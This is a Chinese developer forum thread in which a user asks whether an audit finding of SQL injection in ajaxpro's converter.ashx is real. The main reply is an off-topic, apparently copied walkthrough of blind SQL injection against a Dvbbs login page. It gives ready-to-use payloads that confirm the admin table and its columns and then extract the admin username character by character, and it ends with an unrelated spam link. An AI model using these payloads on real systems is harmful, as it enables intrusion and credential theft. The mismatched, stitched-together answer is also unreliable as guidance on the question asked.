首页 新闻 会员 周边 捐助

ajaxpro存在SQL注入漏洞?

0
悬赏园豆:50 [待解决问题]

我的网站系统用了ajaxpro v6.4,最近安全评估公司给出评估报告说存在SQL注入漏洞。

URL:http://xxx.xxx.xx.xxx/ajaxpro/converter.ashx

提交类型:HEADERS

参数:User-Agent

测试URL:http://xxx.xxx.xx.xxx/ajaxpro/converter.ashx

 请各位兄弟帮忙看看。

 

Guxx的主页 Guxx | 初学一级 | 园豆:150
提问于:2011-01-14 12:34
< >
分享
所有回答(2)
0

你的代码不连数据库的话 会存在sql注入? 自己代码搞定就OK了

码尔代夫iimax | 园豆:3138 (老鸟四级) | 2011-01-14 16:36
0

分析下”洞网/”,环境架好后.找到有问题的语句:

      End If
       Else
              username=trim(Dvbbs.CheckStr(request("username")))
              If ajaxPro Then username = unescape(username)
       End If
username带入到查询语句如下:
       If ChkUserLogin(username,password,mobile,usercookies,1)=false Then
              Set chrs=Dvbbs.Execute("select Passport,IsChallenge from [Dv_User] where username='"&username&"' and IsChallenge=1")
              If chrs.eof and chrs.bof Then
                     If Not ajaxPro Then
                            Dvbbs.AddErrCode(12)
                     Else
                            strString("本论坛不存在该用户名.@@@@0")'o
                     End If
                     Exit Function
              End If
              set chrs=nothing
       End If
:
select Passport,IsChallenge from [Dv_User] where username='"&username&"' and IsChallenge=1
:
where' and (select count(*) from Dv_Admin)>0 and '1'='1 //判断是否存在表名Dv_Admin
,就会变成:
select Passport,IsChallenge from [Dv_User] where username=’ where' and (select count(*) from Dv_Admin)>0 and '1'='1 and IsChallenge=1
:
where
logins.asp用户名里填入:
where' and (select count(*) from Dv_Admin)>0 and '1'='1
.

,如果登录正常,说明,存在表单Dv_admin,

,如果出错提示,证明无此表单.
,构造语句:
where' and(select count(username) from Dv_admin)>0 and '1'='1
//判断是否存在列名username
where' and(select count(password) from Dv_admin)>0 and '1'='1
//判断是否存在列名password
where' and(select top 1 len(username) from dv_admin)>10 and '1'='1
where' and(select top 1 len(username) from dv_admin)<5 and '1'='1
where' and(select top 1 len(username) from dv_admin)=5 and '1'='1
//判断username列表值长度是否大于10,小于5,等于5
where' and (select top 1 asc(mid(username,1,1)) from dv_admin)>100 and 1=1 and '1'='1
where' and (select top 1 asc(mid(username,1,1)) from dv_admin)<97 and 1=1 and '1'='1
where' and (select top 1 asc(mid(username,1,1)) from dv_admin)=97 and 1=1 and '1'='1
//判断username列表的第一位字母的ASCII码值是否大于100,小于97,等于97
where' and (select top 1 asc(mid(username,2,1)) from dv_admin)>100 and 1=1 and '1'='1
where' and (select top 1 asc(mid(username,2,1)) from dv_admin)<97 and 1=1 and '1'='1
where' and (select top 1 asc(mid(username,2,1)) from dv_admin)=97 and 1=1 and '1'='1
//判断username列表的第二位字母的ASCII码值是否大于100,小于97,等于97http://www.chinadrtv.com/shouji/sjppfl/nokia/5440.shtml

ivyy2011 | 园豆:275 (菜鸟二级) | 2011-01-16 16:37
清除回答草稿
   您需要登录以后才能回答,未注册用户请先注册